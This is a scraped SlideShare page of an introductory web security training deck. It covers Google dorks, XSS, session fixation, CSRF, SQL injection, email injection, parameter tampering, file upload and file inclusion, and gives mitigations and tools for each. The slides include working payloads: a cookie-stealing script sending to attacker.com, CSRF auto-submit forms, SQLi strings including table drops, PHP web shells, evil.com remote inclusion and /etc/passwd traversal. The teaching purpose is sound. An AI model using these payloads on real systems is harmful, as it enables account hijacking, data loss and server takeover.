SlideShare une entreprise Scribd logo
1  sur  69
Télécharger pour lire hors ligne
Web Security
[websec] Introduction

                          Prepared by
                        Oles Seheda
Agenda

   Why web?
   Google hacking
   $GET_READY (browser and proxy)
   Session hijacking (XSS, Session Fixation, Brute
    force)
   How to... easy passwords
   CSRF
   SQL injection and other injection types
   Parameter tampering
   File inclusion, path traversal
   Unrestricted file upload
   Tools
   Theory & Practice resources
   Q&A
Agenda


                       Vulnerability

         More info                             Overview




Mitigation                                                Image




     Tools                                          Examples




              Demonstration            Usage
Intro




Quality
Intro




Quality is not only functionality*
         *(Implemented and tested requirements)




                Non-functional?
Baseline              Load                        Security
Compatibility         L10n and i18n               Scalability
Compliance            Performance                 Stress
Documentation         Recovery                    Usability
Endurance             Resilience                  Volume
Intro




Quality is value to some
         person
                 - Jerry Weinberg
Intro




     75% of cyber attacks
and Internet security violations
    are generated through
     Internet applications
                     Source: Gartner Group
Intro




 Amateurs hack systems,
professionals hack people
                  - Bruce Schneier
Social Engineering




                  Social Engineering


Social Engineering is the act of manipulating a person to
accomplish goals that may or may not be in the "target's" best
interest.
This may include obtaining information, gaining access, or getting
the target to take certain action.
Social Engineering


Social Engineering techniques
• Pretexting
• Diversion theft
• Phishing
• Vishing (IVR or phone phishing)
• Baiting (Trojan Horse)
• Quid pro quo (something for something)



Useful resource
The Official Social Engineering Portal
http://www.social-engineer.org/
Disclaimer




                    *****
    All the information provided in this
presentation are for educational purposes
only. The speaker is no way responsible for
       any misuse of the information.
           Use it on our own risk!
                    *****
Google Hacking




                      Google Hacking
       AKA: Google Dorks, Google scanning, Search engine hacking




Google hacking is the term used when an attacker tries to find
exploitable targets or/and sensitive data by using advanced
operators in search engines or code search engines.

Main targets are software vulnerabilities and misconfigurations.
Google Hacking

Examples
Search for vulnerable software
intitle:powered by wordpress
Logs containing usernames and/or passwords
"admin account info" filetype:log
Open webcams
inurl:/view/index.shtml
SQL injection
inurl:"id="
inurl:index.php?id=
Vkontakte.ru - deleted photos
site:vkontakte.ru "Фотографии со страницы DELETED"
Directory indexing (listing)
intitle:index.of
RFI
inurl:index.php?page=
Google Hacking



The Google Hacking Database (GHDB) is a database of queries
that identify sensitive data.

Useful resources
Google Hacking Database (GHDB)
http://www.exploit-db.com/google-dorks/
http://www.hackersforcharity.org/ghdb/
Google Hacking Diggity Project
http://www.stachliu.com/resources/tools/google-hacking-diggity-project/
Google Hacking

Mitigation
1. Do not upload info that you are not comfortable to share
   with whole world
2. Mask server software that you are running on (e.g., default
   error messages)
3. Use META tags
       <meta name="GOOGLEBOT" content="NOINDEX"/>
4. Use robots.txt
       User-agent: *
       Disallow: /private/
5. Use http://www.google.com/remove.html

Tools
SiteDigger
Goolag (Gooscan)
Get ready




For web security testing we need the
          following tools:


  1. Browser         2. Proxy
Browsers




        Browsers can block
         reflected XSS???

Chrome 16, 17, 18                     Yes
IE 9, 10                              Yes
Firefox 8, 9, 10                      No
Opera 12                              No
Safari 5.1                            Yes


 Source: http://browserscope.org/?category=security
Browsers



The Hacker Firefox                         Sandcat Browser
http://sourceforge.net/projects/hackfox/   http://syhunt.com/?n=Sandcat.Browser

Firefox add-ons:                           Features:
•   Firebug                                •   Live HTTP Headers
•   Tamper Data                            •   Request Editor extension
•   Web Developer                          •   Fuzzer
•   HackBar                                •   JavaScript Executor extension
•   Poster                                 •   Lua Executor extension
•   Live HTTP Headers                      •   Syhunt Gelo
•   and more…                              •   HTTP Brute Force
                                           •   CGI Scanner scripts
                                           •   and more…
Browsers



Mantra
http://www.getmantra.com/

Firefox add-ons:
•   Firebug                 •   Cookies Manager+
•   SQLite Manager          •   Firecookie
•   Hackbar                 •   Autofill Forms
•   Tamper Data             •   Modify Headers
•   Live HTTP Headers       •   Poster
•   Web Developer           •   SeleniumIDE
•   SQL Inject Me           •   Websecurify
•   XSS Me                  •   FoxyProxy
                            •   and more…
Proxy



Burp Suite
http://portswigger.net/burp/



WebScarab
http://sourceforge.net/projects/owasp/files/WebScarab/



Paros Proxy
http://www.parosproxy.org/



Tamper Data (Firefox add-on)
https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
Session Hijacking




                   Session Hijacking


Session hijacking is the act of taking control of a user session
after successfully obtaining or generating an authentication
session ID.

Methods
1. Capture/Steal (sniffing, MitM, XSS)
2. Fixation
3. Prediction (calculate, fuzzing, brute force)
Cross-Site Scripting




                      Cross-Site Scripting
                                AKA: CSS, XSS




XSS is a type of vulnerability in web applications which allow code injection by
malicious web users into the web pages viewed by other users.


Types
Type 1: Non-persistent, Non-permanent, Reflected, First-order, Passive
Type 2: Persistent, Permanent, Stored, Second-order, Active
Cross-Site Scripting | Reflected


                                                              ‫׼‬http://example.com
    http://example.com/search?q=<script>alert(XSS)</script>
         http://example.com/<script>alert(XSS)</script>


A                                                                                   XSS
                                                                                     OK




                               Cookie grabber
                                      or
                              malicious web site




                                                              ‫׼‬http://example.com/<script>code</script>




V
Cross-Site Scripting | Reflected

Examples
http://example.com/search?q=<script>document.location='htt
p://attacker.com/cg.php?cookie='+document.cookie</script>

Masking malicious URL
URL escaping (http://scriptasylum.com/tutorials/encode-decode.html):
http://example.com/search?q=%3C%73%63%72%69%70%74%3E%64%6F
%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%
74%70%3A%2F%2F%61%74%74%61%63%6B%65%72%68%6F%73%74%2E%63%6
F%6D%2F%63%67%2E%70%68%70%3F%63%6F%6F%6B%69%65%3D%27%2B%64
%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73%63%72%
69%70%74%3E

URL shortening:
http://goo.gl/SWC0D
http://bit.ly/wFFW13
http://tinyurl.com/6lmthu7
http://ow.ly/8lPYg
http://is.gd/b1MkPT
Cross-Site Scripting | Stored


                                          ‫׼‬http://example.com

    <img height="0" width="0" src=code>

A                                                               XSS
                                                                OK




                     Cookie grabber
                            or
                    malicious web site                   DB           ID=7




                                          ‫׼‬http://example.com




V
Cross-Site Scripting | Stored

Examples
<h1>LOL<blink><marquee><br><br>XSS
<script>alert(1)</script>
"><script>alert(1)</script><!—
<script type="text/javascript" src=alert(1)></script>
<b onMouseOver=alert(1)>bolded text</b>
<form><button formaction="javascript:alert(1)">xss
<video><source onerror="javascript:alert(1)“
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<math href="javascript:alert(1)">CLICKME</math>
Cross-Site Scripting

Mitigation
1. Filter all input
2. Escape all output
3. Encoding of all HTML special characters (in potentially
   malicious data) before display by web applications (or client-
   side script) AKA quoting or escaping
                        <script>alert('xss');</script>
                             V      V        V
                  &lt;script&gt;alert('xss');&lt;/script&gt;
4. Whitelist is better then blacklist policy (blacklist easier to
   bypass)
Cross-Site Scripting

Useful resources
XSS cheat sheet
       http://ha.ckers.org/xss.html
       http://html5sec.org/
       http://www.xenuser.org/xss-cheat-sheet/
</xssed> - xss attacks information
       http://www.xssed.com/

Tools
XSSer
XSS-Proxy
XSS Me (Firefox add-on)
X5s (Fiddler add-on)
DOM XSS Scanner (http://www.domxssscanner.com/)
Session Fixation




                    Session fixation


Session fixation attacks attempt to exploit the vulnerability of a
system which allows one person to fixate (set) another person's
session identifier (SID).
Session Fixation


                                                  ‫׼‬http://example.com




A           Set-Cookie: SESSIONID=1234




                                                  ‫׼‬http://example.com
    http://example.com/login.php?SESSIONID=1234
                                                                              Login
V                                                                          Password

                                                                                OK
Session Fixation

Examples
Using URL
http://example.com/;JSESSIONID=1234 (J2EE)
http://example.com/?PHPSESSID=1234 (PHP)
Using XSS
http://example.com/<script>document.cookie="SESSIONID=1234";</scr
ipt>
http://example.com/<script>document.cookie="SESSIONID=1234;%20Exp
ires=Friday,%201-Jan2015%2000:00:00%20GMT";</script>
Using Meta tag
http://example.com/<meta%20http-equiv=Set-
Cookie%20content="SESSIONID=1234">
Session Fixation

Mitigation
1. Regenerate session ID after a successful login
2. Validate user specific data (Agent, IP, HTTP-X-Forwarded-For
   etc)
Fuzzing




                          Fuzzing
                         AKA: Fuzz testing




Fuzzing is a software testing technique, often automated or semi-
automated, that involves providing invalid, unexpected, or
random data to the inputs of a web application or computer
program.
Fuzzing is commonly used to test for security problems in
software or computer systems.
Brute Force




                      Brute Force


Brute-force attacks are mainly used for guessing passwords and
bypassing access control.

Types
Dictionary attack
Hybrid attack
Search attack (Brute Force)
Rainbow table (Memory Trade Off Attacks)
Brute Force


Mitigation
1. Use CAPTHA
2. Use timeout
3. Black list suspicious IPs

Tools
THC Hydra
Medusa
Burp Suite
MD5 Cracker online resources
More at http://sectools.org/tag/crackers/
Easy Password v1

PasswordCard (http://www.passwordcard.org)




     My Facebook password is -  8 RED (3) symbols from right to left:

                                5R6wfc86
             (to hack this password it would take about 106 years)
                     http://howsecureismypassword.net/
Easy Password v2




I used to be an adventurer
          like you,
    then I took an arrow
       in the knee…

                    - Every Skyrim guard
Easy Password v2

I used to be an adventurer like you, then I took an arrow in the
                             knee…

                                  i = 1, !, l
       iutbaaly                    a = @, 4                   !uTb@aly
          8 symbols                s = $, 5                     8 symbols
  (about 13 minutes to hack)                              (about 18 days to hack)
                                   g = 9, 6




                                Host: facebook.com
                                    DOB: 12.06

                               mk12!uTb@aly06cf
                                   16 symbols
                         (about 193 trillion years to hack)
Cross-Site Request Forgery




              Cross-Site Request Forgery
  AKA: CSRF (sea surf), XSRF, Session Ridding, One-click, Confused Deputy




CSRF is an attack which forces an end user to execute unwanted actions on a
web application in which he/she is currently authenticated.
Cross-Site Request Forgery



     http://example.com/acc?newpass=123qwe&confirmpass=123qwe


A
                                           ‫׼‬http://example.com



                                                    Password was changed successfully

    Malicious web site                                            OK




V
Cross-Site Request Forgery

Examples
Using URL
http://example.com/changePswd?newPswd=123qwe&confirm=123qwe

Typical Payloads Formatting
<img src="http://example.com/changePswd?newPswd=123qwe>

<img height="0" width="0"
src="http://example.com/edit?mail=x@example.com">

<iframe
src="http://example.com/transfer?amount=1500&destAcc=123456">
Cross-Site Request Forgery

Examples
Iframe
<iframe style="width: 0px; height: 0px; visibility: hidden"
name="hidden"></iframe>
<form name="csrf" action="http://example.com/account/edit"
method="post" target="hidden">
<input type="hidden" name="email" value="attacker@example.com"/>
<script>document.csrf.submit();</script>

HTML Form
<html>
<body>
  <form method=POST action=" http://example.com/account/edit">
    <input type="text" name="email" value="attacker@example.com">
    <input type="submit" id="submit">
  </form>
  <script>
    document.getElementById("submit").click();
  </script>
</body>
</html>
Cross-Site Request Forgery


Mitigation
1. Use POST rather than GET in forms (partial solution)
2. Check HTTP Referrer header
3. Require verification (password, CAPTCHA)
4. Use session tokens (hash, secret)
   <input type="hidden" name="sessid" id="sessid"
   value="sdf8awh2oid0fh">


Tools
Pinata
CSRFTester
CSRF Formbuilder and Formgrabber
SQL Injection




                            SQL Injection
                                AKA: SQLi, SQLia




SQL injection is a code injection technique that exploits a security vulnerability
occurring in the database layer of an application.
SQL Injection


                                               ‫׼‬http://example.com


A                                                                                Login

           Login:        admin                                                Password
           Password:     x' or '1'='1' --
                                                                                   OK




                                                                       OK




DB                                                         WebApp
                         TRUE



SELECT * FROM users WHERE login = '$login' AND password = '$password';
SELECT * FROM users WHERE login = ‘'admin' AND password = 'x' OR '1'='1' --
SQL Injection

Examples
http://example.com/vip?id=-1
http://example.com/vip?id=3'
True/false
' and 1=1 (true)
' and 2=1 (false)
Time based
' wait for delay '0:0:15'
' and sleep(15)
Guessing number of fields
'   union   select 1,2 #
'   group   by 2 #
'   order   by 2 #
'   union   select null,@@version #
'   union   select null,table_name from information_schema.tables #
Semicolon for statement termination
'; drop table tableName; #
'; update tableName set filedName='value' where...; --
SQL Injection


Useful resources
SQLi cheat sheet
http://ha.ckers.org/sqlinjection/
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
http://old.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
http://www.michaelboman.org/books/sql-injection-cheat-sheet-mssql


Tools
sqlmap
sqlninja
Havij Power Injector
SQL Inject Me (Firefox add-on)
SQL Injection


Mitigation
1. Escape/Quotesafe the input (string quoting/parsing)
2. Filter input (use whitelists not blacklists)
3. Use mechanisms that enforce separation between data and
   code (prepared statements, parameterized queries, or stored
   procedures)
4. Limit database permissions (start with the lowest
   permissions)
5. Handle errors
Email Injection




                   Email Injection
                   AKA: Email Header Injection




Email injection is a vulnerability that can occur in web
applications that are used to send email messages.
User may exploit the MIME format to append additional
information to the message being sent, such as a new list of
recipients or a completely different message body or to send
large numbers of messages anonymously.
Email Injection

Examples
TO:   user@example.com%0Ato:attacker@example.com
TO:   user@example.com%0D%0Ato:attacker@example.com
TO:   user@example.com%0Abcc:attacker@example.com
TO:   user@example.com%0ASubject:Free%20Viagra
Note:
Windows uses a CR and LF for new Line
Linux uses only LF
Where:
%0A = LF, line feed, newline (n)
%0D = CR, carriage return (r)




Mitigation
1. Filter input for "r" and "n"
Parameter Tampering




                Parameter Tampering
     AKA: Parameter manipulation, Insecure direct object reference




Parameter Tampering attack is based on the manipulation of
parameters exchanged between client and server in order to
modify application data, such as user credentials and
permissions, price and quantity of products, etc.
Parameter Tampering

Examples
Form fields
<input type="hidden" id="791" name="cost" value="19.99">
URL parameters
http://example.com/accinfo?accID=5
http://example.com/buy?itemId=5&ammount=1&price=2.51
Cookies
role=user;
Requests
POST /index.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 Gecko/20100101 Firefox/9.0.1
Accept-Language: en-US,en;q=0.8,hi-IN;q=0.5,hi;q=0.3
Proxy-Connection: keep-alive
Referer: http://192.168.56.102/dvwa/vulnerabilities/xss_s/
Cookie: security=low; PHPSESSID=ioodvlu1e0re8draciu5bk1qc3
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

name=test&price=50
Parameter Tampering


Mitigation
1. All input must be validated server side for each request
   (client side validation is easy to bypass)
2. Use parameter and cookie encryption
3. Do not show internals (such as IDs) to end user (use
   sessions)
4. Use indirect reference map with hard to guess keys (hash)
       http://example.com/accinfo?accID=zS8an31g
       where zS8an31g=5


Tools
Burp Suite
WebScarab
Paros Proxy
Tamper Data (Firefox add-on)
Unrestricted File Upload




             Unrestricted File Upload


Uploaded files represent a significant risk to applications.
If the attacker succeeds with uploading malicious file to the
system consequences can vary, including complete system
takeover.
Unrestricted File Upload



Examples
<?php passthru($_GET['cmd']);?>

<? system($_REQUEST['cmd']); ?>

<?php eval($_GET[cmd])?>



Mitigation
1. Filter input (file extension)
2. Use Content-Type request header
3. Use file type recognizer (resizer)
4. Proper server configuration (restrict permissions)
File Inclusion




                           File Inclusion
          AKA: Local File Inclusion (LFI), Remote File Inclusion (RFI)




File inclusion is an attack technique when web applications take user input
(URL, parameter value, etc.) and pass them into file include commands, the
web application might be tricked into including (remote) files with malicious
code.

http://example.com/index.php?page=pageName
File Inclusion

Examples
Local file inclusion (LFI)
http://example.com/index.php?page=/opt/upload/shell.php

http://example.com/index.php?page=C:ftpuploadshell.php

http://example.com/index.php?page=../../../../etc/httpd/log/error
_log&cmd=...




Remote file inclusion (RFI)
http://example.com/index.php?page=http://evil.com/

http://example.com/index.php?page=http://evil.com/malicous.txt?
Path Traversal




                          Path Traversal
                                 (Type of LFI)
  AKA: Directory Traversal, Dot-Dot-Slash, Directory Climbing, Backtracking




Path Traversal attack technique allows an attacker access to files, directories,
and commands that potentially reside outside the web document root
directory. The most basic Path Traversal attack uses the '../' special character
sequence to alter the location of the request.
Path Traversal


Examples
http://example.com/../../../../../etc/passwd
http://example.com/page?file=/etc/passwd
http://example.com/page?file=../../../../../etc/passwd

http://example.com//..%252f..%252f..%252f..%252f..%252f..%252f..%
252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd


Encoding
       ../ = %2e%2e%2f
       .. = %2e%2e%5c
Double encoding
       ../ = %252e%252e%252f
       .. = %252e%252e%255c
Unicode/UTF-8 encoding
       ../ = ..%c0%af
       .. = ..%c1%9c
File Inclusion


Mitigation
1. Filter input
2. Test incoming value against a regular expression
3. Compare incoming value against an array of all possible legal
   values
4. Proper server configuration (restrict permissions or/and
   disallow external include)


Tools
Fimap (RFI/LFI scanner)
Local File Inclusion Vulnerability Scanner
Imperva Top 4




Web Application Attack Report

                   4%
                              37%
          36%                       Directory traversal
                                    SQL injection

                        23%
                                    XSS
                                    RFI
OWASP Top 10




The OWASP Top 10 Web Application Security Risks for 2010 are:
01 Injection
02 Cross-Site Scripting (XSS)
03 Broken Authentication and Session Management
04 Insecure Direct Object References
05 Cross-Site Request Forgery (CSRF)
06 Security Misconfiguration
07 Insecure Cryptographic Storage
08 Failure to Restrict URL Access
09 Insufficient Transport Layer Protection
10 Unvalidated Redirects and Forwards
CWE Top 25



2011 CWE/SANS Top 25 Most Dangerous Software Errors
01 Improper Neutralization of Special Elements used in an SQL Command
02 Improper Neutralization of Special Elements used in an OS Command
03 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
04 Improper Neutralization of Input During Web Page Generation (XSS)
05 Missing Authentication for Critical Function
06 Missing Authorization
07 Use of Hard-coded Credentials
08 Missing Encryption of Sensitive Data
09 Unrestricted Upload of File with Dangerous Type
10 Reliance on Untrusted Inputs in a Security Decision
11 Execution with Unnecessary Privileges
12 Cross-Site Request Forgery (CSRF)
13 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
14 Download of Code Without Integrity Check
15 Incorrect Authorization
16 Inclusion of Functionality from Untrusted Control Sphere
17 Incorrect Permission Assignment for Critical Resource
18 Use of Potentially Dangerous Function
19 Use of a Broken or Risky Cryptographic Algorithm
20 Incorrect Calculation of Buffer Size
21 Improper Restriction of Excessive Authentication Attempts
22 URL Redirection to Untrusted Site
23 Uncontrolled Format String
24 Integer Overflow or Wraparound
25 Use of a One-Way Hash without a Salt
Tools

Vulnerability scanners:
•   Acunetix WVS                         •     W3af
•   Skipfish                             •     Grendel-Scan
•   AppScan                              •     Websecurify
•   HP WebInspect                        •     Burp Suite
•   Nikto (Wikto)                        •     Uniscan
•   Netsparker                           •     and more


Pentest Linux
back|track - http://www.backtrack-linux.org/
backbuntu - http://www.blackbuntu.com/
backbox - http://www.backbox.org/


Find more at…
http://sectools.org/tag/web-scanners/
http://www.owasp.org/index.php/Phoenix/Tools
Looking for theoretical background?


OWASP
https://www.owasp.org/
WASC
http://projects.webappsec.org
Vulnerapedia
http://lab.gsi.dit.upm.es/semanticwiki/index.php/Main_Page
CWE
http://cwe.mitre.org/index.html
Securiteam
http://www.securiteam.com/
Tracker of vulnerable sites
http://www.vulntraq.com/
OWASP CAL9000 Project
Theory is boring… what about some practical lessons?


WebGoat
https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
DVWA (Damn Vulnerable Web Application)
http://www.dvwa.co.uk/
Web Application Exploits and Defenses
http://google-gruyere.appspot.com/
Mutillidae
http://www.irongeek.com/i.php?page=mutillidae/mutillidae-deliberately-vulnerable-
php-owasp-top-10
Stanford SecuriBench
http://suif.stanford.edu/~livshits/securibench/


Online hacking quests
http://mod-x.com
http://hax.tor.hu
http://www.hackthissite.org/
https://www.hacking-lab.com/
Main security rules




1. Do not trust user input
  – Use whitelists rather blacklists
  – Use server side validation


2. Start with least privileges

3. Keep sensitive information safely
Questions?




问题和答案
Thanks for listening!
    To be continued…
                  mail: oles.seheda@gmail.com
                  skypename: oseheda
Web Security - Introduction v.1.3

Contenu connexe

Tendances

Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)Kishor Kumar
 
Top Ten Web Hacking Techniques (2008)
Top Ten Web Hacking Techniques (2008)Top Ten Web Hacking Techniques (2008)
Top Ten Web Hacking Techniques (2008)Jeremiah Grossman
 
Owasp advanced mobile-application-code-review-techniques-v0.2
Owasp advanced mobile-application-code-review-techniques-v0.2Owasp advanced mobile-application-code-review-techniques-v0.2
Owasp advanced mobile-application-code-review-techniques-v0.2drewz lin
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeJeremiah Grossman
 
Hacking the Web
Hacking the WebHacking the Web
Hacking the WebMike Crabb
 
Introduction to Web Application Security - Blackhoodie US 2018
Introduction to Web Application Security - Blackhoodie US 2018Introduction to Web Application Security - Blackhoodie US 2018
Introduction to Web Application Security - Blackhoodie US 2018Niranjanaa Ragupathy
 
Web browser privacy and security
Web browser privacy and security Web browser privacy and security
Web browser privacy and security amiable_indian
 
How to find Zero day vulnerabilities
How to find Zero day vulnerabilitiesHow to find Zero day vulnerabilities
How to find Zero day vulnerabilitiesMohammed A. Imran
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Michael Hendrickx
 
Web security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-kearyWeb security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-kearydrewz lin
 
Presentation on Top 10 Vulnerabilities in Web Application
Presentation on Top 10 Vulnerabilities in Web ApplicationPresentation on Top 10 Vulnerabilities in Web Application
Presentation on Top 10 Vulnerabilities in Web ApplicationMd Mahfuzur Rahman
 
Browser Security by pratimesh Pathak ( Buldhana)
Browser Security by pratimesh Pathak ( Buldhana) Browser Security by pratimesh Pathak ( Buldhana)
Browser Security by pratimesh Pathak ( Buldhana) Pratimesh Pathak
 
Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Jeremiah Grossman
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Jay Nagar
 

Tendances (20)

Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)
 
Starwest 2008
Starwest 2008Starwest 2008
Starwest 2008
 
Top Ten Web Hacking Techniques (2008)
Top Ten Web Hacking Techniques (2008)Top Ten Web Hacking Techniques (2008)
Top Ten Web Hacking Techniques (2008)
 
Owasp advanced mobile-application-code-review-techniques-v0.2
Owasp advanced mobile-application-code-review-techniques-v0.2Owasp advanced mobile-application-code-review-techniques-v0.2
Owasp advanced mobile-application-code-review-techniques-v0.2
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
 
Hacking the Web
Hacking the WebHacking the Web
Hacking the Web
 
Introduction to Web Application Security - Blackhoodie US 2018
Introduction to Web Application Security - Blackhoodie US 2018Introduction to Web Application Security - Blackhoodie US 2018
Introduction to Web Application Security - Blackhoodie US 2018
 
Web browser privacy and security
Web browser privacy and security Web browser privacy and security
Web browser privacy and security
 
How to find Zero day vulnerabilities
How to find Zero day vulnerabilitiesHow to find Zero day vulnerabilities
How to find Zero day vulnerabilities
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)
 
Web security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-kearyWeb security-–-everything-we-know-is-wrong-eoin-keary
Web security-–-everything-we-know-is-wrong-eoin-keary
 
Presentation on Top 10 Vulnerabilities in Web Application
Presentation on Top 10 Vulnerabilities in Web ApplicationPresentation on Top 10 Vulnerabilities in Web Application
Presentation on Top 10 Vulnerabilities in Web Application
 
Brute Force Attack
Brute Force AttackBrute Force Attack
Brute Force Attack
 
Browser Security by pratimesh Pathak ( Buldhana)
Browser Security by pratimesh Pathak ( Buldhana) Browser Security by pratimesh Pathak ( Buldhana)
Browser Security by pratimesh Pathak ( Buldhana)
 
4.Xss
4.Xss4.Xss
4.Xss
 
Identifying XSS Vulnerabilities
Identifying XSS VulnerabilitiesIdentifying XSS Vulnerabilities
Identifying XSS Vulnerabilities
 
Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012
 
Web Security
Web SecurityWeb Security
Web Security
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
 
Web Hacking
Web HackingWeb Hacking
Web Hacking
 

Similaire à Web Security - Introduction v.1.3

Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 
OWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript ApplicationsOWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript ApplicationsLewis Ardern
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan GandhiReliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan Gandhibhumika2108
 
External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) Volkan Özçelik
 
External JavaScript Widget Development Best Practices
External JavaScript Widget Development Best PracticesExternal JavaScript Widget Development Best Practices
External JavaScript Widget Development Best PracticesVolkan Özçelik
 
Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012Volkan Özçelik
 
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub  - A case study of django web applications that are secur...Mr. Mohammed Aldoub  - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...nooralmousa
 
Abusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec gloryAbusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec gloryPriyanka Aash
 
What should I do when my website got hack?
What should I do when my website got hack?What should I do when my website got hack?
What should I do when my website got hack?Sumedt Jitpukdebodin
 
Devouring Security Insufficient data validation risks Cross Site Scripting
Devouring Security Insufficient data validation risks Cross Site ScriptingDevouring Security Insufficient data validation risks Cross Site Scripting
Devouring Security Insufficient data validation risks Cross Site Scriptinggmaran23
 
Basics of getting Into Bug Bounty Hunting
Basics of getting Into Bug Bounty HuntingBasics of getting Into Bug Bounty Hunting
Basics of getting Into Bug Bounty HuntingMuhammad Khizer Javed
 
04. xss and encoding
04.  xss and encoding04.  xss and encoding
04. xss and encodingEoin Keary
 
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka IrongeekMutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka IrongeekMagno Logan
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks Ahmed Sherif
 
A security note for web developers
A security note for web developersA security note for web developers
A security note for web developersJohn Ombagi
 
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
 DDD17 - Web Applications Automated Security Testing in a Continuous Delivery... DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...Fedir RYKHTIK
 

Similaire à Web Security - Introduction v.1.3 (20)

Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
 
Romulus OWASP
Romulus OWASPRomulus OWASP
Romulus OWASP
 
Web security
Web securityWeb security
Web security
 
OWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript ApplicationsOWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript Applications
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
 
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan GandhiReliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
 
External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1)
 
API SECURITY
API SECURITYAPI SECURITY
API SECURITY
 
External JavaScript Widget Development Best Practices
External JavaScript Widget Development Best PracticesExternal JavaScript Widget Development Best Practices
External JavaScript Widget Development Best Practices
 
Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012
 
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
